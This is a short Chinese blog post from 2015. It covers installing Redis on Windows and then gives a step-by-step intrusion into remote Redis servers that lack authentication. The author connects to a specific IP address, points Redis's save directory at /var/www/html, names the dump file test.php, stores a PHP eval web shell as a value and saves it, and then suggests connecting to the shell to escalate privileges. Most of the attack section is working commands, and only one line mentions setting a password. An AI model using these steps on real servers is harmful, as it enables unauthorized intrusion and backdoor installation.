redis安装:

 

windows安装包:http://pan.baidu.com/s/1i3jLlC5

 

下载下来之后,开始安装:

 

redis-server.exe redis.conf:

 

 

简单一步,安装成功,保持这个windows持续运行~

 

查看一下我们本机的端口,可以看到多了一个6379端口,安全风险来了,记得设置redis的密码~

 

 

接下来,开始利用redis-cli.exe来进行远程redis的入侵:

 

如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell:

 

开启redis客户端

 

输入以下命令来连接远程redis

 

redis-cli -h 125.39.185.150 -p 6379

 

接下来,在远程redis内存中设置数据:

 

config set dir /var/www/html(在内存中设置切换的web目录/var/www/html)

 

config set dbfilename test.php(在内存中的/var/www/html目录下建立一个test.php文件)

 

set xiaoma "<?php @eval($_POST[mi]);?>"(设置key-value,此时该值在Memory中)

 

save (将Memory中的key-value保存到硬盘,并保存为test.php文件)

 

四个OK就搞定了~

 

 

此时,就可以直接连shell,开始提权了~

 

redis入侵参考:

 

http://www.wooyun.org/bugs/wooyun-2015-0101465

 

http://www.wooyun.org/bugs/wooyun-2010-0105096

posted on 2015-09-23 19:34  milantgh  阅读(1753)  评论(0编辑  收藏  举报